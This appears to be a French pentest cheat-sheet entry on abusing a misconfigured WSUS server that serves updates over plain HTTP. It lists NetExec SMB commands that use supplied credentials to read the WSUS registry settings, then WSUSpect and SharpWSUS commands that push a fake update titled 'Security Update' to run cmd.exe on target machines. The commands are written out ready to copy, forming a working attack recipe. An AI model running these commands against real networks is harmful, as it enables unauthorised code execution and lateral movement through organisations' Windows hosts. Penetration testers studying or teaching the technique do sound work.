Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate'Description: Lire la config WSUS : URL du serveur de mise à jour dans le registre.
Pre-Exploitation
Exploiter un WSUS mal configuré (HTTP) pour pousser de fausses mises à jour.
nxc smb $TARGET -u $USER -p $PASS -x 'reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate'Description: Lire la config WSUS : URL du serveur de mise à jour dans le registre.
nxc smb $TARGET -u $USER -p $PASS -M wsusDescription: Module NXC pour détecter et vérifier la configuration WSUS sur la cible.
python3 wsuspect.py -u http://$WSUS_SERVER:8530 -c whoamiDescription: WSUSpect : pousser une fausse mise à jour si le serveur WSUS est en HTTP (non HTTPS).
SharpWSUS.exe create /payload:'C:\Windows\System32\cmd.exe' /args:'/c whoami > C:\Temp\out.txt' /title:'Security Update'Description: Créer une fausse mise à jour via SharpWSUS si on a accès au serveur WSUS.